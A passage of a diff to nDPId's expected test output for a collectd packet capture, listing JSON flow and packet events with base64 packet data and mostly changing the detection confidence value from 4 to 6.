2jxv7jB\/7C1x4ERVxqcLGWKVSyPtJGgd833gDOhBdG4xbUSAQLAZ93ZhNhqDYpSH1iLu4WeSFrvXELH+6cym0Y6TgPbHb995Xd4eeznstGpKVPXUMBMYKyolrAJf5IhADYmfwsVbHYwmMY4b+7dLe8Xm4J6pnNHkCQ8D8q\/xlIjpnUrS9OVed\/2DlDBS1QStbE\/5D9qtP1vKoQWi7aNQljNk4LIQq71gjvpOQoYs5A2fU7jqs5Cj7g1YVzvRN1szG+q0InctAJFWNqveI4E4VlH\/arcTeRtG6STEypPhnpvREi8Y1HMoKqCoQ2XNXh6LreKH8j13m7n5IUINrWLGczoOvwh46DPuvBo2KGeZrJslABigBIDcj82i9s8gLnjLw9\/JZ2x7gkouGNhGSwI6E+HHJlTbRNuUsv\/6rZpEcDEihG4n3z7Vt80LO+ANJQ1PEO96u3kHeqsvkky84XapbdS3hpG\/ZxbNSNY8nK4OCSOQQ8HmKfoJVs6uDOBd\/wp2958CwlilWA+S7vIiQ1XgDMWkpnLBj0SxBkzaVjTocJQTqqyWTwe3IhhIJv81ISkko8HlqeLw6ucXInaAjACXZe+tWeEVUOeFlwkGIIzC1N4S0VtZ61SexhHWzr\/i9+G9ZKKsehcu3XJBgh1f60wB6VdfrKhuC5O+DjSawaWC4SpBpu+HXc5ivM+uiz5tYgYFHvZZNAX520+pU7SYW1nlm8z8\/p7hrSy4or4XEkX6alUhb2dPGHzFD8JaAiNPkifbtDixhZdVcES3WwpR0Ee8a2+96wN6EZWNgwUs7rB2p7yVJHR76cDlQ4Kn2ZsRDtijNF38f24MQDLxP4V3sCe2kxcWUIAwjR6dboGGToHbd4gC7kvh\/FM9CeCXw8edRrjHiX4wnTLxVl9Tka0gXAevnElxIQ6DbX8f3r7039o6XRuqpxn0ACZ1UjAWdNP5AnrGPEDhQYcbCL1rrIoiDXNbcbYfPGBMR0rENIqKDB4er0OJ0AMEmws1dKMgg8kdYXjcu2lTLVY4\/4d9fGNXECu0E+IBVi1I\/a05N27robtMnHhQS3RLkMgdw2UHSJmRpgA2AeN7d5fzdRb1cndtHczkpZ4DqnETqYT245MmiMyzhppvI8TfDhCd1ynjvTf\/tCkooHN2LdiiRy3Nwel6jnMS4sDovy8cCEn9qicofWJUG7y5a\/VIh54v0RwEEnumWw\/ZdPXVhbMfahFcQa0uAqmRQ+1dUag87w7YOq0bDC6ojsLdQ0XEWCC562cwnsSkgbZ5fTl3ZKIGjfA5C2IbcoLoeLIRL87MyrjfoqdSbenCEN1JHvCKm8MwRfUxtBnRG6JvCJKg82EHDqygdxWBY5xyz+WlvhZcsZvu\/jKGESQRQiW2wuv9DlwnzHiLS\/qJ\/XT4Fpxe9+g=="} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"collectd.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946742156132,"flow_last_seen":946742156132,"flow_idle_time":200000,"flow_min_l4_payload_len":1326,"flow_max_l4_payload_len":1326,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":1326,"midstream":0,"thread_ts_msec":946746151465,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36064,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"collectd.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946742156132,"flow_last_seen":946742156132,"flow_idle_time":200000,"flow_min_l4_payload_len":1326,"flow_max_l4_payload_len":1326,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":1326,"midstream":0,"thread_ts_msec":946746151465,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36064,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} 00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6,"source":"collectd.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946742155132,"flow_last_seen":946742155132,"flow_idle_time":200000,"flow_min_l4_payload_len":1326,"flow_max_l4_payload_len":1326,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":1326,"midstream":0,"thread_ts_msec":946746151465,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36320,"dst_port":25826,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"collectd","breed":"Acceptable","category":"System"}} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"collectd.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946742155132,"flow_last_seen":946742155132,"flow_idle_time":200000,"flow_min_l4_payload_len":1326,"flow_max_l4_payload_len":1326,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":1326,"midstream":0,"thread_ts_msec":946746151465,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36320,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"collectd.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946742154132,"flow_last_seen":946742154132,"flow_idle_time":200000,"flow_min_l4_payload_len":1326,"flow_max_l4_payload_len":1326,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":1326,"midstream":0,"thread_ts_msec":946746151465,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36576,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"collectd.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946742154132,"flow_last_seen":946742154132,"flow_idle_time":200000,"flow_min_l4_payload_len":1326,"flow_max_l4_payload_len":1326,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":1326,"midstream":0,"thread_ts_msec":946746151465,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36576,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":6,"source":"collectd.pcap","alias":"nDPId-test","packets-captured":6,"packets-processed":5,"total-skipped-flows":0,"total-l4-payload-len":6710,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":5,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":20,"global_ts_msec":1655315218479} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"collectd.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655315218479,"flow_last_seen":1655315218479,"flow_idle_time":200000,"flow_min_l4_payload_len":1344,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":1344,"flow_avg_l4_payload_len":1344,"midstream":0,"thread_ts_msec":1655315218479,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54138,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02235{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"collectd.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1655315218479,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1386,"pkt_l4_len":1352,"thread_ts_msec":1655315218479,"pkt":"AAAAAAAAAAAAAAAACABFAAVcLQ9AAEARCoB\/AAABfwAAAdN6ZOIFSANcAAAAFWRldmxhcC5mcml0ei5ib3gAAAgADBiqhsIetVOvAAkADAAAAAKAAAAAAAIACGNwdQAAAwAGMwAABAAIY3B1AAAFAAlpZGxlAAAGAA8AAQIAAAAAAEh8igAIAAwYqobCHrR67QADAAYxAAAFAAluaWNlAAAGAA8AAQIAAAAAAAAAMQAIAAwYqobCHrVLVQADAAYyAAAFAAlpZGxlAAAGAA8AAQIAAAAAAEm00wAIAAwYqobCHryG+AACAAttZW1vcnkAAAMABQAABAALbWVtb3J5AAAFAAl1c2VkAAAGAA8AAQEAAAAA2BLtQQAFAA1idWZmZXJlZAAABgAPAAEBAAAAANBcwEEABQALY2FjaGVkAAAGAA8AAQEAAAAAynjmQQAFAAlmcmVlAAAGAA8AAQEAAAAAkCfAQQAFAA5hdmFpbGFibGUAAAYADwABAQAAAAAE3+tBAAUAEHNsYWJfdW5yZWNsAAAGAA8AAQEAAAAAANaXQQAFAA5zbGFiX3JlY2wAAAYADwABAQAAAAAg7ahBAAgADBiqhsSesjKdAAIACGNwdQAAAwAGMAAABAAIY3B1AAAFAAl1c2VyAAAGAA8AAQIAAAAAABaX1gAIAAwYqobEnrJfCQADAAYyAAAGAA8AAQIAAAAAABQBWwAIAAwYqobEnrKDcQADAAYzAAAGAA8AAQIAAAAAABXhLQAIAAwYqobEnrLCpgADAAYxAAAFAAtzeXN0ZW0AAAYADwABAgAAAAAABKFFAAgADBiqhsSess\/yAAMABjAAAAUACXdhaXQAAAYADwABAgAAAAAAAENLAAgADBiqhsSesk3YAAMABjEAAAUACXVzZXIAAAYADwABAgAAAAAAFeA2AAgADBiqhsSestJFAAUACXdhaXQAAAYADwABAgAAAAAAAENGAAgADBiqhsSesqjuAAMABjAAAAUAC3N5c3RlbQAABgAPAAECAAAAAAAEokkACAAMGKqGxJ6yx68AAwAGMwAABgAPAAECAAAAAAAEhJAACAAMGKqGxJ6y1z0ABQAJd2FpdAAABgAPAAECAAAAAAAAPhAACAAMGKqGxJ6y2ckAAwAGMAAABQAJbmljZQAABgAPAAECAAAAAAAAACYACAAMGKqGxJ6y3FYAAwAGMQAABgAPAAECAAAAAAAAADEACAAMGKqGxJ6y4OIAAwAGMwAABgAPAAECAAAAAAAAADAACAAMGKqGxJ6yxTgAAwAGMgAABQALc3lzdGVtAAAGAA8AAQIAAAAAAASXNwAIAAwYqobEnrLUXAAFAAl3YWl0AAAGAA8AAQIAAAAAAABGMAAIAAwYqobEnrLuvwAFAA5pbnRlcnJ1cHQAAAYADwABAgAAAAAAAM\/mAAgADBiqhsSesvscAAMABjAAAAUADHNvZnRpcnEAAAYADwABAgAAAAAAAOnzAAgADBiqhsSesv0mAAMABjEAAAYADwABAgAAAAAAAHMKAAgADBiqhsSesuvPAAUADmludGVycnVwdAAABgAPAAECAAAAAAAAo1oACAAMGKqGxJ6y8H0AAwAGMwAABgAPAAECAAAAAAAAbUsACAAMGKqGxJ6y\/yAAAwAGMgAABQAMc29mdGlycQAABgAPAAECAAAAAAAAUq8ACAAMGKqGxJ6zBsgAAwAGMAAABQAKc3RlYWwAAAYADwABAgAAAAAAAAAAAAgADBiqhsSeswuRAAMABjIAAAYADwABAgAAAAAAAAAAAAgADBiqhsSest6\/AAUACW5pY2UAAAYADwABAgAAAAAAAAAr"} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"collectd.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655315218479,"flow_last_seen":1655315218479,"flow_idle_time":200000,"flow_min_l4_payload_len":1344,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":1344,"flow_avg_l4_payload_len":1344,"midstream":0,"thread_ts_msec":1655315218479,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54138,"dst_port":25826,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"collectd.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655315218479,"flow_last_seen":1655315218479,"flow_idle_time":200000,"flow_min_l4_payload_len":1344,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":1344,"flow_avg_l4_payload_len":1344,"midstream":0,"thread_ts_msec":1655315218479,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54138,"dst_port":25826,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} 00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7,"source":"collectd.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946746151465,"flow_last_seen":946746151465,"flow_idle_time":200000,"flow_min_l4_payload_len":1366,"flow_max_l4_payload_len":1366,"flow_tot_l4_payload_len":1366,"flow_avg_l4_payload_len":1366,"midstream":0,"thread_ts_msec":1655315218479,"l3_proto":"ip4","src_ip":"192.168.178.35","dst_ip":"239.192.74.66","src_port":39576,"dst_port":25826,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"collectd","breed":"Acceptable","category":"System"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"collectd.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946746151465,"flow_last_seen":946746151465,"flow_idle_time":200000,"flow_min_l4_payload_len":1366,"flow_max_l4_payload_len":1366,"flow_tot_l4_payload_len":1366,"flow_avg_l4_payload_len":1366,"midstream":0,"thread_ts_msec":1655315218479,"l3_proto":"ip4","src_ip":"192.168.178.35","dst_ip":"239.192.74.66","src_port":39576,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7,"source":"collectd.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946746151465,"flow_last_seen":946746151465,"flow_idle_time":200000,"flow_min_l4_payload_len":1366,"flow_max_l4_payload_len":1366,"flow_tot_l4_payload_len":1366,"flow_avg_l4_payload_len":1366,"midstream":0,"thread_ts_msec":1655315218479,"l3_proto":"ip4","src_ip":"192.168.178.35","dst_ip":"239.192.74.66","src_port":39577,"dst_port":25826,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"collectd","breed":"Acceptable","category":"System"}} @@ -29,28 +29,28 @@ 02214{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"collectd.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1655315238479,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1370,"pkt_l4_len":1336,"thread_ts_msec":1655315238479,"pkt":"AAAAAAAAAAAAAAAACABFAAVMObJAAEAR\/ex\/AAABfwAAAdN6ZOIFOANMAAAAFWRldmxhcC5mcml0ei5ib3gAAAgADBiqhscetBqdAAkADAAAAAKAAAAAAAIACGNwdQAAAwAGMQAABAAIY3B1AAAFAA5pbnRlcnJ1cHQAAAYADwABAgAAAAAAAKNkAAgADBiqhscetF03AAMABjMAAAUADHNvZnRpcnEAAAYADwABAgAAAAAAADppAAgADBiqhscetFN7AAMABjIAAAYADwABAgAAAAAAAFKyAAgADBiqhsces99LAAMABjMAAAUACW5pY2UAAAYADwABAgAAAAAAAAAwAAgADBiqhscetHcUAAMABjIAAAUACnN0ZWFsAAAGAA8AAQIAAAAAAAAAAAAIAAwYqobHHrSGmwADAAYzAAAGAA8AAQIAAAAAAAAAAAAIAAwYqobHHrSVUgADAAYwAAAFAAlpZGxlAAAGAA8AAQIAAAAAAEY\/oQAIAAwYqobHHrSeKQADAAYxAAAGAA8AAQIAAAAAAEfo0wAIAAwYqobHHrSp9QADAAYyAAAGAA8AAQIAAAAAAEm7CwAIAAwYqobHHrSzJwADAAYzAAAGAA8AAQIAAAAAAEiCvgAIAAwYqobHHrz4NAACAAttZW1vcnkAAAMABQAABAALbWVtb3J5AAAFAAl1c2VkAAAGAA8AAQEAAAAAnhPtQQAFAA1idWZmZXJlZAAABgAPAAEBAAAAAPBdwEEABQALY2FjaGVkAAAGAA8AAQEAAAAAgoHmQQAFAAlmcmVlAAAGAA8AAQEAAAAAQP+\/QQAFAA5hdmFpbGFibGUAAAYADwABAQAAAAA83OtBAAUAEHNsYWJfdW5yZWNsAAAGAA8AAQEAAAAAgM6XQQAFAA5zbGFiX3JlY2wAAAYADwABAQAAAACA8KhBAAgADBiqhscetEZwAAIACGNwdQAAAwAGMQAABAAIY3B1AAAFAAxzb2Z0aXJxAAAGAA8AAQIAAAAAAABzFgAIAAwYqobHHrQwpgADAAYzAAAFAA5pbnRlcnJ1cHQAAAYADwABAgAAAAAAAG1PAAgADBiqhscetGYpAAMABjAAAAUACnN0ZWFsAAAGAA8AAQIAAAAAAAAAAAAIAAwYqobHHrRulgADAAYxAAAGAA8AAQIAAAAAAAAAAAAIAAwYqobJnrHCtwADAAYwAAAFAAl1c2VyAAAGAA8AAQIAAAAAABaZBAAIAAwYqobJnrInDwADAAYyAAAGAA8AAQIAAAAAABQCXAAIAAwYqobJnrIEPAADAAYxAAAGAA8AAQIAAAAAABXhOQAIAAwYqobJnrJKgAADAAYzAAAGAA8AAQIAAAAAABXiOQAIAAwYqobJnrLEAgADAAYyAAAFAAtzeXN0ZW0AAAYADwABAgAAAAAABJeYAAgADBiqhsmessoeAAMABjMAAAYADwABAgAAAAAABIT4AAgADBiqhsmestlJAAMABjAAAAUACXdhaXQAAAYADwABAgAAAAAAAENRAAgADBiqhsmesunZAAMABjMAAAYADwABAgAAAAAAAD4SAAgADBiqhsmest6UAAMABjEAAAYADwABAgAAAAAAAENMAAgADBiqhsmesvFnAAMABjAAAAUACW5pY2UAAAYADwABAgAAAAAAAAAmAAgADBiqhsmesvgHAAMABjEAAAYADwABAgAAAAAAAAAxAAgADBiqhsmesxIGAAMABjIAAAYADwABAgAAAAAAAAArAAgADBiqhsmeszJGAAMABjAAAAUADmludGVycnVwdAAABgAPAAECAAAAAAABDpI="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"collectd.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655315313991,"flow_last_seen":1655315313991,"flow_idle_time":200000,"flow_min_l4_payload_len":1343,"flow_max_l4_payload_len":1343,"flow_tot_l4_payload_len":1343,"flow_avg_l4_payload_len":1343,"midstream":0,"thread_ts_msec":1655315313991,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35988,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02247{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"collectd.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1655315313991,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1385,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1385,"pkt_l4_len":1351,"thread_ts_msec":1655315313991,"pkt":"AAAAAAAAAAAAAAAACABFAAVbgM9AAEARtsB\/AAABfwAAAYyUZOIFRwNbAAAAFWRldmxhcC5mcml0ei5ib3gAAAgADBiqhtn\/u8qjAAkADAAAAAKAAAAAAAIAC21lbW9yeQAABAALbWVtb3J5AAAFAAl1c2VkAAAGAA8AAQEAAAAAlh\/tQQAFAA1idWZmZXJlZAAABgAPAAEBAAAAAKhiwEEABQALY2FjaGVkAAAGAA8AAQEAAAAAFLfmQQAFAAlmcmVlAAAGAA8AAQEAAAAAQOK9QQAFABBzbGFiX3VucmVjbAAABgAPAAEBAAAAAIDOl0EABQAOYXZhaWxhYmxlAAAGAA8AAQEAAAAASLbrQQAFAA5zbGFiX3JlY2wAAAYADwABAQAAAAAA\/6hBAAgADBiqhtx\/ZhRUAAIACGNwdQAAAwAGMAAABAAIY3B1AAAFAAl1c2VyAAAGAA8AAQIAAAAAABac6gAIAAwYqobcf2a6WwADAAYyAAAGAA8AAQIAAAAAABQGUgAIAAwYqobcf2Z5QgADAAYxAAAGAA8AAQIAAAAAABXlMgAIAAwYqobcf2fq4wADAAYzAAAGAA8AAQIAAAAAABXmCQAIAAwYqobcf2ls0AADAAYwAAAFAAtzeXN0ZW0AAAYADwABAgAAAAAABKQvAAgADBiqhtx\/ak1hAAMABjEAAAYADwABAgAAAAAABKMvAAgADBiqhtx\/auPbAAMABjIAAAYADwABAgAAAAAABJkFAAgADBiqhtx\/auwdAAMABjMAAAYADwABAgAAAAAABIaAAAgADBiqhtx\/avZhAAMABjAAAAUACXdhaXQAAAYADwABAgAAAAAAAENoAAgADBiqhtx\/ayYTAAMABjEAAAYADwABAgAAAAAAAENqAAgADBiqhtx\/ay+GAAMABjIAAAYADwABAgAAAAAAAEY5AAgADBiqhtx\/azbWAAMABjMAAAYADwABAgAAAAAAAD4lAAgADBiqhtx\/az+lAAMABjAAAAUACW5pY2UAAAYADwABAgAAAAAAAAAmAAgADBiqhtx\/a0duAAMABjEAAAYADwABAgAAAAAAAAAxAAgADBiqhtx\/a1DeAAMABjIAAAYADwABAgAAAAAAAAArAAgADBiqhtx\/a4HiAAMABjAAAAUADmludGVycnVwdAAABgAPAAECAAAAAAABDtoACAAMGKqG3H9rm7MAAwAGMwAABgAPAAECAAAAAAAAbXsACAAMGKqG3H9rwnYAAwAGMAAABQAMc29mdGlycQAABgAPAAECAAAAAAAA6lEACAAMGKqG3H9ryqYAAwAGMQAABgAPAAECAAAAAAAAc00ACAAMGKqG3H9r0hQAAwAGMgAABgAPAAECAAAAAAAAUtAACAAMGKqG3H9rdmgAAwAGMwAABQAJbmljZQAABgAPAAECAAAAAAAAADAACAAMGKqG3H9r2UUABQAMc29mdGlycQAABgAPAAECAAAAAAAAOoIACAAMGKqG3H9rkwMAAwAGMgAABQAOaW50ZXJydXB0AAAGAA8AAQIAAAAAAADQJQAIAAwYqobcf2vh9wADAAYwAAAFAApzdGVhbAAABgAPAAECAAAAAAAAAAAACAAMGKqG3H9sELgAAwAGMgAABgAPAAECAAAAAAAAAAAACAAMGKqG3H9sBvkAAwAGMQAABgAPAAECAAAAAAAAAAAACAAMGKqG3H9sIysAAwAGMAAABQAJaWRsZQAABgAPAAECAAAAAABGWboACAAMGKqG3H9sa1QAAwAGMgAABgAPAAECAAAAAABJ1ecACAAMGKqG3H9sLP4AAwAGMQAABgAPAAECAAAAAABIA0o="} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"collectd.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655315313991,"flow_last_seen":1655315313991,"flow_idle_time":200000,"flow_min_l4_payload_len":1343,"flow_max_l4_payload_len":1343,"flow_tot_l4_payload_len":1343,"flow_avg_l4_payload_len":1343,"midstream":0,"thread_ts_msec":1655315313991,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35988,"dst_port":25826,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"collectd.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655315313991,"flow_last_seen":1655315313991,"flow_idle_time":200000,"flow_min_l4_payload_len":1343,"flow_max_l4_payload_len":1343,"flow_tot_l4_payload_len":1343,"flow_avg_l4_payload_len":1343,"midstream":0,"thread_ts_msec":1655315313991,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35988,"dst_port":25826,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} 02219{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"collectd.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1655315323990,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1365,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1365,"pkt_l4_len":1331,"thread_ts_msec":1655315323990,"pkt":"AAAAAAAAAAAAAAAACABFAAVHirVAAEARrO5\/AAABfwAAAYyUZOIFMwNHAAAAFWRldmxhcC5mcml0ei5ib3gAAAgADBiqhtx\/bHQGAAkADAAAAAKAAAAAAAIACGNwdQAAAwAGMwAABAAIY3B1AAAFAAlpZGxlAAAGAA8AAQIAAAAAAEidkAAIAAwYqobcf2pzkAACAAttZW1vcnkAAAMABQAABAALbWVtb3J5AAAFAAtjYWNoZWQAAAYADwABAQAAAADquuZBAAUACWZyZWUAAAYADwABAQAAAABg9LtBAAUADmF2YWlsYWJsZQAABgAPAAEBAAAAAGx860EABQAQc2xhYl91bnJlY2wAAAYADwABAQAAAADAzpdBAAUADnNsYWJfcmVjbAAABgAPAAEBAAAAACACqUEACAAMGKqG3H9rit0AAgAIY3B1AAADAAYxAAAEAAhjcHUAAAUADmludGVycnVwdAAABgAPAAECAAAAAAAAo6sACAAMGKqG3H9qc5AAAgALbWVtb3J5AAADAAUAAAQAC21lbW9yeQAABQANYnVmZmVyZWQAAAYADwABAQAAAACIY8BBAAUACXVzZWQAAAYADwABAQAAAAASWe1BAAgADBiqhtx\/bBifAAIACGNwdQAAAwAGMwAABAAIY3B1AAAFAApzdGVhbAAABgAPAAECAAAAAAAAAAAACAAMGKqG3v9j7tsAAwAGMAAABQAJdXNlcgAABgAPAAECAAAAAAAWnWUACAAMGKqG3v9kGvkAAwAGMwAABgAPAAECAAAAAAAV5owACAAMGKqG3v9kAsUAAwAGMQAABgAPAAECAAAAAAAV5a4ACAAMGKqG3v9kKaIAAwAGMAAABQALc3lzdGVtAAAGAA8AAQIAAAAAAASkXAAIAAwYqobe\/2Q\/lAADAAYyAAAGAA8AAQIAAAAAAASZMwAIAAwYqobe\/2QPLwAFAAl1c2VyAAAGAA8AAQIAAAAAABQGygAIAAwYqobe\/2RCiwADAAYzAAAFAAtzeXN0ZW0AAAYADwABAgAAAAAABIaoAAgADBiqht7\/ZEc5AAMABjEAAAUACXdhaXQAAAYADwABAgAAAAAAAENuAAgADBiqht7\/ZDoJAAUAC3N5c3RlbQAABgAPAAECAAAAAAAEo1oACAAMGKqG3v9kRJUAAwAGMAAABQAJd2FpdAAABgAPAAECAAAAAAAAQ2sACAAMGKqG3v9kdBkAAwAGMQAABQAJbmljZQAABgAPAAECAAAAAAAAADEACAAMGKqG3v9kTQoAAwAGMAAABgAPAAECAAAAAAAAACYACAAMGKqG3v9kd7IAAwAGMgAABgAPAAECAAAAAAAAACsACAAMGKqG3v9kegkAAwAGMwAABgAPAAECAAAAAAAAADAACAAMGKqG3v9kSxUABQAJd2FpdAAABgAPAAECAAAAAAAAPicACAAMGKqG3v9kjPIAAwAGMgAABQAOaW50ZXJydXB0AAAGAA8AAQIAAAAAAADQKgAIAAwYqobe\/2SPNAADAAYzAAAGAA8AAQIAAAAAAABtfwAIAAwYqobe\/2R86AADAAYwAAAGAA8AAQIAAAAAAAEO8QAIAAwYqobe\/2SRKwAFAAxzb2Z0aXJxAAAGAA8AAQIAAAAAAADqWgAIAAwYqobe\/2R\/CgADAAYxAAAFAA5pbnRlcnJ1cHQAAAYADwABAgAAAAAAAKOyAAgADBiqht7\/ZJVyAAMABjIAAAUADHNvZnRpcnEAAAYADwABAgAAAAAAAFLTAAgADBiqht7\/ZJMuAAMABjEAAAYADwABAgAAAAAAAHNS"} 02227{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"collectd.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1655315333991,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1371,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1371,"pkt_l4_len":1337,"thread_ts_msec":1655315333991,"pkt":"AAAAAAAAAAAAAAAACABFAAVNjPBAAEARqq1\/AAABfwAAAYyUZOIFOQNNAAAAFWRldmxhcC5mcml0ei5ib3gAAAgADBiqht7\/ZJeFAAkADAAAAAKAAAAAAAIACGNwdQAAAwAGMwAABAAIY3B1AAAFAAxzb2Z0aXJxAAAGAA8AAQIAAAAAAAA6hAAIAAwYqobe\/2SylwAFAApzdGVhbAAABgAPAAECAAAAAAAAAAAACAAMGKqG3v9kSVQAAwAGMgAABQAJd2FpdAAABgAPAAECAAAAAAAARkgACAAMGKqG3v9ksAAABQAKc3RlYWwAAAYADwABAgAAAAAAAAAAAAgADBiqht7\/ZMKYAAMABjEAAAUACWlkbGUAAAYADwABAgAAAAAASAZ5AAgADBiqht7\/ZMWkAAMABjIAAAYADwABAgAAAAAASdkKAAgADBiqht7\/ZMh